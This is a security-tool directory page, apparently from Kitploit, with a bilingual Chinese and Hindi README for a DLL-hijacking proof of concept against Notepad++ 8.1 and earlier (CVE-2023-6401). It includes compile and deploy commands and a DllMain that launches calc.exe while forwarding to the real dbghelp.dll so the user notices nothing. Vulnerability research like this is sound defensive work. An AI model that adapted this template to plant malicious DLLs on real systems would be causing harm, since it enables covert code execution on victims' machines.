Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-6401 — CVE-2023-6401 एक DLL अपहरण (hijacking) भेद्यता है जो हमलावरों को एप्लिकेशन निर्देशिका में एक दुर्भावनापूर्ण `dbghelp.dll` फ़ाइल रखकर मनमाना कोड निष्पादित करने की अनुमति देती है। यह प्रोजेक्ट भेद्यता को प्रदर्शित करता है और एक प्रतिलिपि योग्य (reproducible) PoC प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/mekitoci/cve-2023-6401
भेद्यता विश्लेषणशोषणलर्निंग और शिक्षापेलोड डेवलपमेंटबाइनरी शोषण
GitHubmekitoci/cve-2023-6401

CVE-2023-6401

CVE-2023-6401 एक DLL अपहरण (hijacking) भेद्यता है जो हमलावरों को एप्लिकेशन निर्देशिका में एक दुर्भावनापूर्ण `dbghelp.dll` फ़ाइल रखकर मनमाना कोड निष्पादित करने की अनुमति देती है। यह प्रोजेक्ट भेद्यता को प्रदर्शित करता है और एक प्रतिलिपि योग्य (reproducible) PoC प्रदान करता है।

रिपॉजिटरी देखें
171 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-6401 · DLL हाइजैकिंग प्रूफ-ऑफ-कॉन्सेप्ट

License Platform

English | 中文


中文

⚠️ 重要聲明:僅供安全研究和教育目的使用

NotePad++ ≤ 8.1 DLL劫持漏洞的概念驗證。通過在應用程式目錄放置惡意 dbghelp.dll 來執行任意程式碼。

快速開始

root@kitploit:~
# 下載專案
git clone https://github.com/mekitoci/CVE-2023-6401.git

# 進入專案目錄
cd CVE-2023-6401-main

# 編譯DLL
# gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

# 部署到NotePad++目錄
copy dbghelp.dll "C:\Program Files\Notepad++\"

# 執行測試
"C:\Program Files\Notepad++\notepad++.exe"

# 立即清理
del "C:\Program Files\Notepad++\dbghelp.dll"

計算器彈出 + 訊息框顯示 + NotePad++正常啟動

預期結果:

PoC result

漏洞詳情

項目詳情
CVE編號CVE-2023-6401
影響版本NotePad++ ≤ 8.1
漏洞類型DLL劫持 / 搜尋路徑劫持
影響執行任意程式碼
前提條件應用程式目錄寫入權限

原理

Windows按以下順序載入DLL:

  1. 應用程式目錄(最高優先級)
  2. System32目錄
  3. Windows目錄
  4. 當前目錄
  5. PATH環境變數

NotePad++啟動時會載入 dbghelp.dll,通過在應用程式目錄放置同名惡意DLL,可在系統DLL載入前執行程式碼。

技術實現

核心代碼

root@kitploit:~
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // 執行惡意程式碼
        WinExec("calc.exe", SW_SHOW);
        MessageBoxA(NULL, "CVE-2023-6401 Crack", "Alert", MB_OK);

        // 載入真實DLL並轉發API調用
        char systemPath[MAX_PATH];
        GetSystemDirectoryA(systemPath, MAX_PATH);
        strcat(systemPath, "\\dbghelp.dll");
        realDbghelp = LoadLibraryA(systemPath);
        
        if (realDbghelp)
            realImageNtHeader = (pImageNtHeader)GetProcAddress(realDbghelp, "ImageNtHeader");
        break;
    }
    return TRUE;
}

關鍵特點

  • 搜尋順序劫持:利用Windows DLL搜尋機制
  • API轉發:載入真實DLL並轉發函式調用,保持應用程式正常運行
  • 隱蔽性:用戶察覺不到異常

編譯選項

MinGW (推薦)

root@kitploit:~
gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

清理

root@kitploit:~
# 移除惡意DLL
del "C:\Program Files\Notepad++\dbghelp.dll"

# 確認移除
dir "C:\Program Files\Notepad++\dbghelp.dll" 2>nul || echo "清理完成"

參考資料

  • CVE-2023-6401
  • Microsoft DLL搜尋順序
  • MITRE ATT&CK T1574.001

免責聲明

本專案僅供教育和安全研究使用。使用者需對遵守適用法律法規承擔全部責任。


अंग्रेज़ी

⚠️ महत्वपूर्ण अस्वीकरण: केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए

NotePad++ ≤ 8.1 में DLL हाइजैकिंग भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट। एप्लिकेशन निर्देशिका में एक दुर्भावनापूर्ण dbghelp.dll रखकर मनमाना कोड निष्पादित करें।

त्वरित आरंभ

root@kitploit:~
# प्रोजेक्ट क्लोन करें
git clone https://github.com/mekitoci/CVE-2023-6401.git

# प्रोजेक्ट निर्देशिका में जाएं
cd CVE-2023-6401-main

# gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

# NotePad++ निर्देशिका में तैनात करें
copy dbghelp.dll "C:\Program Files\Notepad++\"

# परीक्षण निष्पादित करें
"C:\Program Files\Notepad++\notepad++.exe"

# तुरंत सफाई
del "C:\Program Files\Notepad++\dbghelp.dll"

अपेक्षित परिणाम: कैलकुलेटर पॉप अप होता है + संदेश बॉक्स प्रदर्शित होता है + NotePad++ सामान्य रूप से शुरू होता है

PoC result

भेद्यता विवरण

आइटमविवरण
CVE संख्याCVE-2023-6401
प्रभावित संस्करणNotePad++ ≤ 8.1
भेद्यता प्रकारDLL हाइजैकिंग / खोज क्रम हाइजैकिंग
प्रभावमनमाना कोड निष्पादन
पूर्वापेक्षाएँएप्लिकेशन निर्देशिका में लिखने की अनुमति

तंत्र

Windows निम्नलिखित क्रम में DLL लोड करता है:

  1. एप्लिकेशन निर्देशिका (सर्वोच्च प्राथमिकता)
  2. System32 निर्देशिका
  3. Windows निर्देशिका
  4. वर्तमान निर्देशिका
  5. PATH पर्यावरण चर

NotePad++ स्टार्टअप पर dbghelp.dll लोड करता है। एप्लिकेशन निर्देशिका में समान नाम वाला एक दुर्भावनापूर्ण DLL रखकर, सिस्टम DLL लोड होने से पहले कोड निष्पादित किया जा सकता है।

तकनीकी कार्यान्वयन

मुख्य कोड

root@kitploit:~
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // दुर्भावनापूर्ण कोड निष्पादित करें
        WinExec("calc.exe", SW_SHOW);
        MessageBoxA(NULL, "CVE-2023-6401 Crack", "Alert", MB_OK);

        // वास्तविक DLL लोड करें और API कॉल अग्रेषित करें
        char systemPath[MAX_PATH];
        GetSystemDirectoryA(systemPath, MAX_PATH);
        strcat(systemPath, "\\dbghelp.dll");
        realDbghelp = LoadLibraryA(systemPath);
        
        if (realDbghelp)
            realImageNtHeader = (pImageNtHeader)GetProcAddress(realDbghelp, "ImageNtHeader");
        break;
    }
    return TRUE;
}

मुख्य विशेषताएं

  • खोज क्रम हाइजैकिंग: Windows DLL खोज तंत्र का शोषण
  • API अग्रेषण: वास्तविक DLL लोड करता है और सामान्य एप्लिकेशन संचालन बनाए रखने के लिए फ़ंक्शन कॉल अग्रेषित करता है
  • गुप्तता: उपयोगकर्ता को कोई असामान्यता नज़र नहीं आती

संकलन विकल्प

MinGW (अनुशंसित)

root@kitploit:~
gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

सफाई

root@kitploit:~
# दुर्भावनापूर्ण DLL निकालें
del "C:\Program Files\Notepad++\dbghelp.dll"

# हटाने की पुष्टि करें
dir "C:\Program Files\Notepad++\dbghelp.dll" 2>nul || echo "सफाई पूर्ण"

संदर्भ

  • CVE-2023-6401
  • Microsoft DLL खोज क्रम
  • MITRE ATT&CK T1574.001

अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। उपयोगकर्ता लागू कानूनों और विनियमों के अनुपालन के लिए पूरी तरह से जिम्मेदार हैं।

टूल डाउनलोड करें